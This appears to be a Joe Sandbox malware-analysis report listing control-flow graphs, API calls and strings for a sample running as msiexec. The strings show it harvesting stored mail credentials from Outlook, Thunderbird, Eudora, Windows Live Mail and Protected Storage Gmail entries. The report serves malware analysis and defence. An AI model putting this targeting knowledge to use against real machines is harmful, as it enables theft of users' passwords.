410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 33986->33985 33987->33948 33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls __fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34256 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 34001->34003 34002->34003 34004 44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 137 408432-40844e 132->137 138 40842d-408431 132->138 135 408460-408464 134->135 136 408465-408482 134->136 135->136 136->133 136->134 137->130 137->132 138->137
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040832F
                                                                                • memset.MSVCRT ref: 00408343
                                                                                • memset.MSVCRT ref: 0040835F
                                                                                • memset.MSVCRT ref: 00408376
                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                • API String ID: 1832431107-3760989150
                                                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                                APIs
                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                • String ID: ACD
                                                                                • API String ID: 379999529-620537770
                                                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                • atoi.MSVCRT(?), ref: 00401FE0
                                                                                • memset.MSVCRT ref: 00402003
                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                • memset.MSVCRT ref: 00402086
                                                                                • memset.MSVCRT ref: 0040209B
                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                • memset.MSVCRT ref: 00402018
                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                • API String ID: 3833278029-4223776976
                                                                                • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                • API String ID: 745651260-375988210
                                                                                • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                Strings
                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                • API String ID: 1197458902-317895162
                                                                                • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                • String ID: k:v
                                                                                • API String ID: 3662548030-4078055367
                                                                                • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0044430B
                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                • memset.MSVCRT ref: 00444379
                                                                                • memset.MSVCRT ref: 00444394
                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                Strings
                                                                                • Store Root, xrefs: 004443A5
                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                • API String ID: 3203569119-2578778931
                                                                                • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                • String ID:
                                                                                • API String ID: 2054149589-0
                                                                                • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 882979914-1578091866
                                                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • memset.MSVCRT ref: 004109F7
                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                • memset.MSVCRT ref: 00410A32
                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
